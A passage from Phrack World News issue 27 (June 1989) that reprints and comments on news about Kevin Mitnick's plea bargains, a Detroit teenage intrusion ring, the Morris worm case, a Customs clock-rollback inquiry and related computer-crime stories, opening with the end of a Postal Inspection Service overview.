  4551. ORGANIZED CRIME
  4552.  
  4553. Investigations by Postal Inspectors in organized crime matters most frequently
  4554. relate to cases involving theft and fencing of large amounts of stamp stock and
  4555. securities by organized post office burglary rings; insurance and investment
  4556. frauds; and planned bankruptcies and schemes aimed at looting company assets.
  4557. The Organized Crime Control Act of 1970 specifically includes violation of the
  4558. Mail Fraud Statue as "racketeering activity."  Postal Inspectors are assigned
  4559. to the Justice Department Organized Crime Strike Forces which operate at various
  4560. points throughout the country.
  4561.  
  4562.  
  4563. MAIL THEFT/BURGLARY/ROBBERY
  4564.  
  4565. Investigation of mail theft offenses are a large part of the Inspection
  4566. Service's responsibilities and most commonly involve stolen checks, food
  4567. coupons, or other negotiable securities.  Primary attention is directed at
  4568. major gangs, sophisticated fencing operations, large scale thefts, and the
  4569. implementation of preventive programs.
  4570.  
  4571. Burglaries of post offices range from vandalism to high level burglary rings
  4572. and fencing operations involving organized crime activity.
  4573.  
  4574. Armed robberies endanger the lives of postal employees and the public and,
  4575. therefore, are priority investigations.  The targets of these crimes usually
  4576. are postal facilities, vehicles transporting mail, and individual employees,
  4577. primarily letter carriers.
  4578.  
  4579.  
  4580. DRUGS
  4581.  
  4582. Illegal trafficking in drugs, narcotics, and other controlled substances
  4583. through the mail is investigated in conjunction with other federal and state
  4584. law enforcement agencies.
  4585.  
  4586.  
  4587. PORNOGRAPHY
  4588.  
  4589. The Inspection Service investigates violations of the Postal Obscenity Statue
  4590. enacted in 1865 which prohibits the sending of obscene materials through the
  4591. U.S. Mail.  This includes the investigation of child pornography offenses
  4592. involving the sexual abuse of exploitation of children based on laws passed in
  4593. 1977 and 1984.
  4594.  
  4595.  
  4596. BOMBS
  4597.  
  4598. Investigations of incidents of threats involving bombs and incendiary devices
  4599. sent through the mails or directed at postal properties or functions are within
  4600. the jurisdiction of the Inspection Service.
  4601.  
  4602.  
  4603. EXTORTION
  4604.  
  4605. The Inspection Service has investigative responsibility in incidents involving
  4606. use of the mails to extort money or property by threat of injury to person's
  4607. reputation or by accusing a person of a crime.
  4608.  
  4609.  
  4610. OTHER PROHIBITED MAILINGS
  4611.  
  4612. The mailing of poisons or other harmful matter prohibited by law is
  4613. investigated by Postal Inspectors.
  4614.  
  4615.  
  4616. Assistance From The Public
  4617. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  4618. In most cases, the Inspection Service must rely on the watchfulness and
  4619. alertness of mail recipients to inform them of possible criminal or harmful
  4620. activity involving the use of the mails.  Any suspected violations of postal
  4621. laws or misuse of the mails should be reported to the local Postmaster for
  4622. referral to a Postal Inspector.  Prompt action on the part of postal customers
  4623. and Postal Inspectors is essential in the interest of crime prevention and
  4624. detection.
  4625. _______________________________________________________________________________
  4626.  
  4627.  
  4628.                                 ==Phrack Inc.==
  4629.  
  4630.                      Volume Three, Issue 27, File 10 of 12
  4631.  
  4632.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4633.             PWN                                                 PWN
  4634.             PWN        P h r a c k   W o r l d   N e w s        PWN
  4635.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  4636.             PWN               Issue XXVII/Part 1                PWN
  4637.             PWN                                                 PWN
  4638.             PWN                  June 20, 1989                  PWN
  4639.             PWN                                                 PWN
  4640.             PWN          Created, Written, and Edited           PWN
  4641.             PWN               by Knight Lightning               PWN
  4642.             PWN                                                 PWN
  4643.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4644.  
  4645.  
  4646.                  Welcome to Issue XXVII of Phrack World News!
  4647.  
  4648. This issue features articles on SouthernNet's hacker scam, the Florida
  4649. probation sex incident, bulletin boards in Argentina, fax attacks, computer
  4650. security, other hacking occurrences, as well as more articles and new
  4651. information about Kevin David Mitnick (aka Condor), Robert Tappan Morris, Karl
  4652. Koch (Hagbard Celine, one of Clifford Stoll's "Wily Hackers"), TRW and Social
  4653. Security Administration, the National Crime Information (NCIC) "Super
  4654. Database," and many other fun stories.
  4655.  
  4656. Because of our temporary exile from Bitnet, this will be the last regular issue
  4657. of Phrack World News until next Fall.  Next issue expect to see the full
  4658. write-up on the details and fun events of SummerCon '89.  It is only two days
  4659. away as of this writing (it kinda begins on Thursday evening for some of us)
  4660. and it looks to be the best SummerCon ever!
  4661.  
  4662. A very special thanks goes to Delta Master, Hatchet Molly, and The Mad Hacker
  4663. who all assisted with this issue's PWN by submitting articles.  Hatchet Molly
  4664. will be serving as a collection agent for Phrack Inc. during the summer.  Be
  4665. sure to forward any news articles to him that seem relevant to PWN and he will
  4666. get them to me (eventually).  He can be reached on the wide area networks at;
  4667.  
  4668.                                 (Hatchet Molly)
  4669.  
  4670.                               TK0GRM2@NIU.BITNET
  4671.                       TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU
  4672.  
  4673. One other thing to mention here is a special hello to one of our government
  4674. readers... Peter Edmond Yee of NASA's Ames Research Center.  He had recently
  4675. remarked that he "had access to Phrack!"  I wonder if he thought that Phrack
  4676. Inc. was top secret or hard to get?  Still if he wanted it that badly, Taran
  4677. King and I thought, "Why not make it easier on him and just send it to his
  4678. network address?"  We did :-)))
  4679.  
  4680. :Knight Lightning
  4681.  
  4682.  
  4683.         "The Real Future Is Behind You... And It's Only The Beginning!"
  4684. _______________________________________________________________________________
  4685.  
  4686. Mitnick Plea Bargain Rejected By Judge As Too Lenient            April 25, 1989
  4687. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4688. Excerpts from Kim Murphy (Los Angeles Times)
  4689.  
  4690.              "Mr. Mitnick, you have been engaging in this conduct
  4691.              for too long, and no one has actually punished you.
  4692.              This is the last time you are going to do this."
  4693.  
  4694. Reportedly U.S. District Judge Mariana Pfaelzer unexpectedly rejected the plea
  4695. bargain of Kevin Mitnick, the hacker once called "as dangerous with a keyboard
  4696. as a bank robber with a gun."  Pfaelzer declared that Mitnick deserves more
  4697. time behind bars.
  4698.  
  4699. As reported in recent issues of Phrack World News, "Mitnick pleaded guilty to
  4700. one count of computer fraud and one count of possessing unauthorized
  4701. long-distance telephone codes... Mitnick faces one year in prison.  Under a
  4702. plea agreement with the government, he must also submit to three years'
  4703. supervision by probation officers after his release from prison."
  4704.  
  4705. On April 24, 1989 Judge Pfaelzer said, "Mr. Mitnick, you have been engaging in
  4706. this conduct for too long, and no one has actually punished you.  This is the
  4707. last time you are going to do this."  She said a confidential pre-sentence
  4708. report recommended that she exceed even the 18-month maximum prison term called
  4709. for under mandatory new federal sentencing guidelines.  The judge's action
  4710. voids Mitnick's guilty plea.
  4711.  
  4712. Both prosecuting and defense attorneys were surprised.  Mitnick's attorney said
  4713. he did not know whether his client would agree to a guilty plea carrying a
  4714. longer prison term.  This could make it harder to bring charges against
  4715. Mitnick's alleged associates.  If Mitnick is brought to trial, testimony from
  4716. at least one of his associates would be required to convict him, and they would
  4717. not appear as witnesses without receiving immunity from prosecution.
  4718. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4719.  
  4720. Computer Hacker Working On Another Plea Bargain                     May 6, 1989
  4721. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4722. Excerpts from the Los Angeles Herald Examiner
  4723.  
  4724. Attorneys said yesterday they are negotiating a second plea bargain for
  4725. computer hacker Kevin Mitnick, whose first offer to plead guilty was scuttled
  4726. by a judge because it called for too little time in prison.
  4727.  
  4728. Mitnick, 25, of Panorama City, California offered in March to serve one year in
  4729. prison and to plead guilty to computer fraud and possessing unauthorized
  4730. long-distance telephone codes.
  4731. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4732.  
  4733. Mitnick Update                                                     May 10, 1989
  4734. ~~~~~~~~~~~~~~
  4735. Excerpts taken from the Los Angeles Times
  4736.  
  4737. When last we heard about Kevin Mitnick, the hacker once called "as dangerous
  4738. with a keyboard as a bank robber with a gun," the judge, Judge Mariana
  4739. Pfaelzer, had rejected a plea bargain as too lenient, saying Mitnick deserved
  4740. more than the agreed one year of jail time [see above articles].
  4741.  
  4742. According to more recent information, Mitnick has now reached a new agreement,
  4743. with no agreed-upon prison sentence.  He pleaded guilty to stealing a DEC
  4744. security program and illegal possession of 16 long-distance telephone codes
  4745. belonging to MCI Telecommunications Corp.  The two charges carry a maximum of
  4746. 15 years and a $500,000 fine.  The government agreed to lift telephone
  4747. restrictions placed on Mitnick since he was jailed in December, 1988.
  4748.  
  4749. At DEC's request, Mitnick will help the firm identify and fix holes in its
  4750. security software to protect itself from other hackers.  He will also cooperate
  4751. in the government's probe of Leonard DiCicco, a fellow hacker.  (DiCicco is the
  4752. "friend" who turned Mitnick in.)
  4753. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4754.  
  4755. Kenneth Siani Speaks Out About Kevin Mitnick                       May 23, 1989
  4756. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4757. Kevin Mitnick, the hacker "so dangerous that he can't even be allowed to use a
  4758. phone."  "He could ruin your life with his keyboard."  "Armed with a keyboard
  4759. and considered dangerous."
  4760.  
  4761. These are some of the things that have been said about this person.  All of
  4762. this media hype would be fine if it just sold newspapers.  But it has done much
  4763. more then just sell a few papers. It has influenced those that will ultimately
  4764. decide his fate.  I myself do not know the man, but I have talked to others
  4765. that do.  Including one of the persons that investigated Mitnick.  From all I
  4766. have heard about him, I think he is a slime ball!  But even a slime ball should
  4767. not be railroaded into a prison sentence that others of equal or greater guilt
  4768. have avoided.
  4769.  
  4770. I personally feel the man is just a criminal, like the guy that robs a 7/11, no
  4771. better but certainly not any worse.  Unfortunately he is thought of as some
  4772. kind of a "SUPER HACKER."  The head of Los Angeles Police Dept's Computer Crime
  4773. Unit is quoted as saying, "Mitnick is several levels above what you would
  4774. characterize as a computer hacker."
  4775.  
  4776. No disrespect intended, but a statement like this from the head of a computer
  4777. crime unit indicates his ignorance on the ability of hackers and phone phreaks.
  4778. Sure he did things like access and perhaps even altered Police Department
  4779. criminal records, credit records at TRW Corp, and Pacific Telephone,
  4780. disconnecting phones of people he didn't like etc.  But what is not understood
  4781. by most people outside of the hack/phreak world is that these things are VERY
  4782. EASY TO DO AND ARE DONE ALL THE TIME.  In the hack/phreak community such
  4783. manipulation of computer and phone systems is all to easy.  I see nothing
  4784. special about his ability to do this.  The only thing special about Kevin
  4785. Mitnick is that he is not a "novice" hacker like most of the thirteen year old
  4786. kids that get busted for hacking/phreaking.  It has been a number of years
  4787. since an "advanced" hacker has been arrested.  Not since the days of the Inner
  4788. Circle gang have law enforcement authorities had to deal with a hacker working
  4789. at this level of ability.  As a general rule, advanced hackers do not get
  4790. caught because of there activity but rather it is almost always others that
  4791. turn them in.  It is therefore easy to understand why his abilities are
  4792. perceived as being extraordinary when in fact they are not.
  4793.  
  4794. Because of all the media hype this case has received I'm afraid that:
  4795.  
  4796. 1.) He will not be treated fairly. He will be judged as a much greater threat
  4797.     to society then others that have committed similar crimes.
  4798.  
  4799. 2.) He will become some kind of folk hero.  A Jesse James with a keyboard.
  4800.     This will only cause other to follow in his footsteps.
  4801.  
  4802. I'm not defending him or the things he has done in any sense.  All I'm saying
  4803. is let's be fair.  Judge the man by the facts, not the headlines.
  4804.  
  4805. Disclaimer:  The views expressed here are my own.
  4806.  
  4807.   Kenneth Siani, Sr. Security Specialist, Information Systems Div., NYMA Inc.
  4808. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4809. If you are looking for other articles about Kevin David Mitnick aka Condor
  4810. please refer to;
  4811.  
  4812. "Pacific Bell Means Business"                   (10/06/88) PWN XXI. . .Part 1
  4813. "Dangerous Hacker Is Captured"                  (No Date ) PWN XXII . .Part 1
  4814. "Ex-Computer Whiz Kid Held On New Fraud Counts" (12/16/88) PWN XXII . .Part 1
  4815. "Dangerous Keyboard Artist"                     (12/20/88) PWN XXII . .Part 1
  4816. "Armed With A Keyboard And Considered Dangerous"(12/28/88) PWN XXIII. .Part 1
  4817. "Dark Side Hacker Seen As Electronic Terrorist" (01/08/89) PWN XXIII. .Part 1
  4818. "Mitnick Plea Bargains"                         (03/16/89) PWN XXV. . .Part 1
  4819. _______________________________________________________________________________
  4820.  
  4821. Computer Intrusion Network in Detroit                              May 25, 1989
  4822. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4823. Taken from the San Jose Mercury News (Knight-Ridder News Service)
  4824.  
  4825. DETROIT -- Secret Service agents smashed what they described as a costly,
  4826. sophisticated computer intrusion network on Wednesday, May 24, and were
  4827. surprised to discover it made up largely of teen-agers.
  4828.  
  4829. The computer systems of more than 20 companies including the Michigan
  4830. Department of Treasury, Home Box Office cable television services, [and RCA]
  4831. were infiltrated, according to agents serving search warrants across the
  4832. country.
  4833.  
  4834. Federal officials said the infiltrations by the network represented fraud of
  4835. $200,000 to $1.5 million in appropriated goods, telephone and computer time.
  4836.  
  4837. Agents expected to arrest some adults when they swept down on eight people who
  4838. allegedly ran the network in several states.  Instead, they found only one
  4839. adult, in Chicago.  The rest were teen-agers as young as 14:  Two in Columbus,
  4840. Ohio; two in Boston, Massachusetts; two in Sterling Heights, Michigan [The
  4841. Outsider and The Untouchable]; and one in Atlanta, Georgia.  Agents expected to
  4842. make another arrest in Los Angeles.
  4843.  
  4844. Officials said at least 55 other people nationwide made use of the network's
  4845. information.
  4846.  
  4847. In Sterling Heights, Secret Service agents pulled two eighth-grader boys, both
  4848. 14, out of school and questioned them in the presence of their parents, who
  4849. apparently were unaware of their activities.  James Huse, special agent in
  4850. charge of the U.S. Secret Service office in Detroit, said the youths admitted
  4851. involvement in the scheme.
  4852.  
  4853. He said the eight-graders, because they are juveniles, cannot be charged under
  4854. federal law and will be dealt with by local juvenile authorities.
  4855.  
  4856. Authorities believe the mastermind is Lynn Doucett, 35, of Chicago.  She was
  4857. arrested Wednesday, May 24, and is cooperating with authorities, Huse said.
  4858.  
  4859. Doucett, who was convicted in Canada of telecommunications fraud, supports
  4860. herself and two children through her computer intrusion activities, which
  4861. include using stolen or counterfeit credit cards for cash advances or money
  4862. orders, according to an affidavit filed in U.S. District Court.
  4863.  
  4864. If convicted, she faces up to 10 years in prison and a $250,000 fine.
  4865.  
  4866.                Special Thanks to Jedi For Additional Information
  4867. _______________________________________________________________________________
  4868.  
  4869. HR 1504 -- Beeper Abuse Prevention Act                             May 22, 1989
  4870. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4871.                  "Pagers Don't Commit Crimes, Congressmen Do."
  4872.  
  4873. The fools in congress assembled are at it again.  Three years in jail for
  4874. selling a pager to a minor?  If you didn't believe when Abbie Hoffman said that
  4875. the drug hysteria was just an excuse for more control of the citizens, think
  4876. again.
  4877.  
  4878. In USA Today was a "face-off" on the issues.  According to this article,
  4879. Representative Kweisi Mfume (D-Md) says the following:
  4880.  
  4881.      "The drug business is using the  latest technology to promote its
  4882.      deadly trade.  One such advance, the paging device, or beeper, is
  4883.      now appearing in classrooms and schoolyards.  I have introduced the
  4884.      Beeper Abuse Prevention Act to curtail the use of beepers by young
  4885.      people who deal drugs.  It would require the Federal Communications
  4886.      Commission to prescribe regulations that would restrict the
  4887.      possession and use of paging devices by persons under age 21.
  4888.  
  4889.      Law officers say dealers and suppliers send coded messages via
  4890.      beeper to youths in school.  The codes translate into messages like
  4891.      "meet me at our regular place after class to pick up the drugs."
  4892.      Drug traffickers are even using 800 numbers now available with
  4893.      regional paging services.  A supplier could actually conduct a
  4894.      transaction in Baltimore from Miami, for example.
  4895.  
  4896.      My bill, H.R. 1504, would require any person selling or renting
  4897.      paging devices to verify the identification and age of every
  4898.      customer; encourage parents and businesses to take more
  4899.      responsibility in their children's or employees' activities; make
  4900.      it unlawful for a person to knowingly and willfully rent, sell or
  4901.      use paging devices in violation of rules prescrived by the FCC
  4902.      (there are provisions for stiff fines and up to three-year prison
  4903.      terms for adults who illegally provide beepers to youths); and
  4904.      require parents or businesses who allow the use of beepers to state
  4905.      that intention with and affidavit at the time of purchase."
  4906.  
  4907. He goes on to say that he recognizes that there are legitimate uses of beepers,
  4908. but we can no longer stand by and watch drugs flow into our neighborhoods.  The
  4909. opposite side is taken by Lynn Scarlett, from Santa Monica, CA.  She asks what
  4910. beepers have to do with the drug trade, and regulating their use will not put a
  4911. dent it it.  She also says that there is little evidence that gun control keeps
  4912. guns out of the hands of gangsters, and it will take a good dose of wizardry to
  4913. keep beepers away from bad guys.  She finishes with:
  4914.  
  4915.      "The logic of the Beeper Abuse Prevention Act opens the door for
  4916.      laws to make us sign promises that we won't, we swear, use these
  4917.      things for illicit acts when we buy them.  De Tocqueville, that
  4918.      eminent observer of our nation, warned that our loss of freedom
  4919.      would sneak in through passage of quiet, seemingly innocuous and
  4920.      well-intended laws -- laws like H.R. 1504.
  4921. _______________________________________________________________________________
  4922.  
  4923. Computer Threat Research Association (UK)                        March 31, 1989
  4924. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4925. For those of you interested an umbrella organization has been established in
  4926. the United Kingdom to coordinate information on, and research into, all aspects
  4927. of computer security.  In the first instance one of the organization's primary
  4928. concerns will be combatting the threat posed by computer viruses by acting as a
  4929. clearing house for virus information and control software.
  4930.  
  4931. Below is a copy of an initial letter mailed to prospective members:
  4932.  
  4933.                    The Computer Threat Research Association
  4934.  
  4935. The computer threat research association, CoTra is a non-profit making
  4936. organization that exists to research, analyze, publicize and find solutions
  4937. for threats to the integrity and reliability of computer systems.
  4938.  
  4939. The issue that caused the formation of CoTra was the rise of the computer
  4940. virus.  This problem has since become surrounded by fear, uncertainty and
  4941. doubt.  To the average user, the computer virus and its implications are a
  4942. worry of an unknown scale.  To a few unfortunates whose systems have become
  4943. victims, it is a critical issue.
  4944.  
  4945. The key advantage of CoTra membership will be access to advice and information.
  4946. Advice will be provided through publications, an electronic conference (a
  4947. closed conference for CoTra's members has been created on the Compulink CIX
  4948. system) as well as other channels such as general postings direct to members
  4949. when a new virus is discovered.
  4950.  
  4951. CoTra membership will be available on a student, full or corporate member
  4952. basis.  All software that is held by CoTra that enhances system reliability,
  4953. such as virus detection and removal software, will be available to all members.
  4954. It is intended to establish discounts with suppliers of reliability tools and
  4955. services.  A library of virus sources and executables and other dangerous
  4956. research material will be made available to members who have a demonstrable
  4957. need.
  4958.  
  4959. A register of consultants who have specific skills in the systems reliability
  4960. field will be published by CoTra and reviews of reliability enhancing software
  4961. will be produced.
  4962.  
  4963. Your support of CoTra will ensure that you have the earliest and most accurate
  4964. information about potential threats to your computer systems.
  4965.  
  4966. CoTra, The Computer Threat Research Association,
  4967. c/o 144 Sheerstock, Haddenham, Bucks.  HP17 8EX
  4968. _______________________________________________________________________________
  4969.  
  4970. Strange Customs Service Clock Department                            May 1, 1989
  4971. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4972. Written by Vanessa Jo Grimm (Goverment Computer News)(Page 6)
  4973.  
  4974. The U.S. attorney for Washington is reviewing an allegation that a Customs
  4975. Service official violated the Computer Security Act [PL 100-235 presumably] by
  4976. altering a computer's internal clock.
  4977.  
  4978. Treasury Department Inspector General Michael R. Hill referred the allegation
  4979. to the prosecutor after an investigation into year-end spending by Custom
  4980. officials at the close of Fiscal Year 1988.  The allegation involves an
  4981. official who may have authorized altering the date maintained by the computers
  4982. that the agency uses for procurement documents, according to Maurice S. Moody,
  4983. the Inspector General's audit director for Financial Management Service.
  4984.  
  4985. Moody recently told the House Ways and Means Subcommittee on Oversight the
  4986. computers are part of the agency's Automated Commercial System.  He declined to
  4987. provide Government Computer News with more details.
  4988.  
  4989. Allegedly the computer clock was rolled back during the first three days of
  4990. October of 1988 so that $41.8 million in procurement obligations would be dated
  4991. in September against fiscal year 1988 appropriations, Moody said.
  4992.  
  4993. An inspector general report issued in late February concluded Customs had not
  4994. violated any procurement laws.  The inspector general's investigation is
  4995. continuing, however.
  4996.  
  4997. "Doesn't $41.8 million worth of procurement on the last day of the fiscal year
  4998. bother anybody?" asked Rep. Richard T. Shulze (R-Pa).  The purchases did bother
  4999. the inspector general, Moody said, and this concern led to getting the United
  5000. State attorney attorney.  "This problem is endemic in the federal government,"
  5001. he said.  "Year-end spending is very common."
  5002.  
  5003. William F. Riley, Customs controller, said he knew about the rollback, but he
  5004. and Deputy Commissioner Michael H. Lane refused to say who authorized the
  5005. action...  Subcommittee members continued to press Riley and Lane.  "Is the
  5006. person still at Customs?" asked subcommittee chairman J. J. Pickle (D-Texas).
  5007. He is working full time and in the position he was at the time," Lane answered.
  5008.  
  5009. Rep. Beryl F. Anthony, Jr. (D-Ark) asked how Riley became aware of the
  5010. rollback.  "He (the official who authorized the rollback) told me that it was
  5011. going to be done," Riley said.
  5012.  
  5013. Rep. Pickle suggested that a high ranking official would have to authorize such
  5014. an action, but Counsel advised Lane not to reply.  He did say neither he nor
  5015. Commissioner von Raab had made the decision.
  5016.  
  5017. The balance of the article deals with the actions of Linda Gibbs, who became
  5018. aware of the incident and reported it to the inspector general after being
  5019. unable to stop the action.  Gibbs also alleged that the action was intended to
  5020. use available year-end money to cover cost overrun on a contract with Northrop
  5021. Corp.  She also alleged that she had been reassigned and given no new duties.
  5022. _______________________________________________________________________________
  5023.  
  5024.  
  5025.                                 ==Phrack Inc.==
  5026.  
  5027.                      Volume Three, Issue 27, File 11 of 12
  5028.  
  5029.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  5030.             PWN                                                 PWN
  5031.             PWN        P h r a c k   W o r l d   N e w s        PWN
  5032.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  5033.             PWN               Issue XXVII/Part 2                PWN
  5034.             PWN                                                 PWN
  5035.             PWN                  June 20, 1989                  PWN
  5036.             PWN                                                 PWN
  5037.             PWN          Created, Written, and Edited           PWN
  5038.             PWN               by Knight Lightning               PWN
  5039.             PWN                                                 PWN
  5040.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  5041.  
  5042.  
  5043. Robert T. Morris Suspended From Cornell                            May 25, 1989
  5044. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5045. Taken from the New York Times
  5046.  
  5047. Cornell University has suspended the graduate student identified by school
  5048. officials as the author of "the Internet worm."
  5049.  
  5050. In a May 16th letter to Robert Tappan Moris, age 23, the dean of the Cornell
  5051. University Graduate School said a university panel had found him guilty of
  5052. violating the school's Code of Academic Integrity.
  5053.  
  5054. He will be suspended until the beginning of the fall semester of 1990, and then
  5055. could reapply.
  5056.  
  5057. No criminal charges have been filed against Morris.  A federal grand jury this
  5058. year forwarded its recommendations to the Justice Department, which has not
  5059. taken any action.
  5060. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5061.  
  5062. Justice Department Wary in Computer Case                           May 28, 1989
  5063. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5064. by Matthew Spina (Syracuse Herald-American)
  5065.  
  5066.               "Is Washington Fearful Of Losing A Landmark Trial?"
  5067.  
  5068. Some computer experts theorize that the Justice Department, afraid of bungling
  5069. what could become a landmark computer case, still doesn't know how to treat the
  5070. Cornell student whose computer worm slithered nationwide in November, 1988.
  5071.  
  5072. A further concern in Washington:  A trial in the case might embarrass the
  5073. Department of Defense if its scientists are asked to detail how their computers
  5074. were among the thousands crippled by the worm.
  5075.  
  5076. For several months, the decision on how to charge 23-year-old Robert T. Morris,
  5077. Jr. had been before Mark Richard, a deputy assistant attorney general.  Within
  5078. the last few weeks, Richard made a decision that now is being reviewed by an
  5079. assistant attorney general, according to a computer professional who has been
  5080. talking with the Justice Department.
  5081.  
  5082. "I thought we would have heard something from Washington by now," said Andrew
  5083. Baxtoer, the assistant U.S. attorney who in November and December presented the
  5084. case to a grand jury in Syracuse.
  5085.  
  5086. The grand jury's report was sent on the the Justice Department, which refuses
  5087. to comment publicly on the matter because Morris has not been indicted.
  5088.  
  5089. "Within the next two weeks I assume that a decision will be made," said one
  5090. official.
  5091.  
  5092. "If they decide to begin an expensive trial, they have to make sure they win so
  5093. as not to damage future attempts to prosecute under that law," said Eugene H.
  5094. Spafford, an assistant professor at Purdue University whose analysis of the
  5095. worm has helped federal investigators.  "If they decide not to prosecute, and
  5096. the total thing that happens is he gets suspended (from Cornell), I will be
  5097. outraged."
  5098.  
  5099. So far, Cornell has taken the only disciplinary measure against Morris,
  5100. suspending him for the 1989-90 academic year.  But the graduate student left
  5101. the computer science department early in November, the day after the worm
  5102. spread out of a computer in Upson Hall.
  5103.  
  5104. Morris, a computer science graduate student, has been called the author of a
  5105. rogue computer program, called a worm, that was spread from a Cornell
  5106. University computer.  The program was designed to reproduce and infect any
  5107. computer linked to the Internet, a network shared by colleges, research centers
  5108. and military institutions.
  5109.  
  5110. However, experts say an error caused the program to replicate out of control,
  5111. sending thousands of copies into thousands of computers.
  5112.  
  5113. If Morris is to be charged with a felony, prosecutors would then have to show
  5114. he intended to destroy or extract information.
  5115.  
  5116. Proving that would be difficult since the program neither destroyed nor removed
  5117. information from any computer.
  5118.  
  5119. To convict Morris on most lesser charges, prosecutors would have to show he
  5120. intended to harm computers.
  5121.  
  5122. Prosecutors also could use a misdemeanor charge requiring them to prove only
  5123. that Morris gained access to a federal government computer. The worm did reach
  5124. computers at the Army Ballistics Research Laboratory and NASA's Langley
  5125. Research Center, among others.
  5126.  
  5127. Some computer experts wonder, though, if Defense Department officials will be
  5128. reluctant to testify publicly about how their computers were penetrated -- even
  5129. those computers holding non-classified information. In February, at a computer
  5130. convention in San Diego, Defense Department computer experts detailed some
  5131. security improvements made to the network since November, but then refused to
  5132. release copies of their presentation to people at the seminar.
  5133.  
  5134. The FBI -- which enforces the Computer Fraud and Abuse Act of 1986 -- and some
  5135. people in the computer industry are pushing for a vigorous prosecution to
  5136. display a strong case against computer hacking.  Others in the industry,
  5137. including some of Morris' friends from Harvard University and Cornell, urge
  5138. leniency because he was trying to demonstrate security flaws with computers.
  5139. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5140.  
  5141. Other articles about Robert Tappan Morris, Jr. and the Internet Worm are;
  5142.  
  5143. "Computer Network Disrupted By 'Virus'"            (11/03/88) PWN XXII/Part 2
  5144. "Virus Attack"                                     (11/06/88) PWN XXII/Part 2
  5145. "The Computer Jam:  How It Came About"             (11/08/88) PWN XXII/Part 2
  5146. "US Is Moving To Restrict {...} Virus"             (11/11/88) PWN XXII/Part 2 *
  5147. "FBI Studies Possible Charges In Virus"            (11/12/88) PWN XXII/Part 2
  5148. "Big Guns Take Aim At Virus"                       (11/21/88) PWN XXII/Part 3
  5149. "Congressman Plan Hearings On Virus"               (11/27/88) PWN XXII/Part 3
  5150. "Pentagon Severs Military {...} Virus"             (11/30/88) PWN XXII/Part 3 *
  5151. "Networks Of Computers At Risk From Invaders"      (12/03/88) PWN XXII/Part 4 *
  5152. "Computer Virus Eradication Act of 1988"           (12/05/88) PWN XXII/Part 4 *
  5153. "Breaking Into Computers {...}, Pure and Simple"   (12/04/88) PWN XXIV/Part 1 *
  5154. "Cornell Panel Concludes Morris {...} Virus"       (04/06/89) PWN XXVI/Part 1
  5155.  
  5156. * - Indicates that the article was not directly related to Robert Morris, but
  5157.     did discuss him as well as the Internet Worm incident.
  5158. _______________________________________________________________________________
  5159.  
  5160. SouthernNet's Anti-Hacker Psychological Con Game                     April 1989
  5161. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5162. WARNING!  Your call is being intercepted!
  5163.  
  5164. Error:  Setting may not be changed by callers.
  5165.  
  5166.  
  5167.                   Welcome to:  S o u t h e r n N e t   I n c.
  5168.  
  5169.  
  5170. You have reached the SouthernNet Fraud Department, the authorization code you
  5171. are attempting to use is not valid.  Hacking and illegal use of codes are
  5172. violations of state and federal laws.
  5173.  
  5174. We are currently conducting an investigaion for code abuse in your area and we
  5175. are coordinating the investigation with law enforcement authorities. Persons
  5176. identified hacking or abusing codes will be prosecuted to the full extent of
  5177. the law.
  5178.  
  5179. I'll see you soon,
  5180.  
  5181. Hacker Tracker
  5182. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5183.  
  5184. Hold for additional information:
  5185.  
  5186. Hacker Tracker is unavailable right now; however, you may avoid possible arrest
  5187. and/or prosecution by calling Hacker Tracker in person.
  5188.  
  5189. You may contact Mr. Tracker between the hours of 9:00 AM and 5:00 PM Eastern
  5190. Standard Time, Monday - Friday, simply by dialing the access number you have
  5191. just used and code number 101010 or 011010 if the access  you have used
  5192. requires a seven digit code.  Just hold the line for 10 seconds and your call
  5193. will automatically be routed to Mr. Tracker at no charge to you.
  5194.  
  5195. This is *NOT* a trick and it will be the intention of SouthernNet Inc. to
  5196. settle this matter without involving law enforcement authorities if you
  5197. cooperate with our fraud department 100%.
  5198.  
  5199. It will certainly be to your advantage to contact Mr. Tracker as this will
  5200. reflect your own decision to assist and avoid prosecution by our company!!!
  5201.  
  5202. I'll be expecting your call.
  5203.  
  5204. Hacker Tracker
  5205.  
  5206. Hold a sec... Engaging Auto Page for Hacker Tracker...
  5207.  
  5208.       50 seconds till disconnect
  5209.       40 seconds till disconnect
  5210.       30 seconds till disconnect
  5211.       20 seconds till disconnect
  5212.       10 seconds till disconnect
  5213.        5 seconds till disconnect
  5214.  
  5215. NO CARRIER
  5216.  
  5217.  
  5218.  [Do you think anyone believed this and actually called "Hacker Tracker?" -KL]
  5219. _______________________________________________________________________________
  5220.  
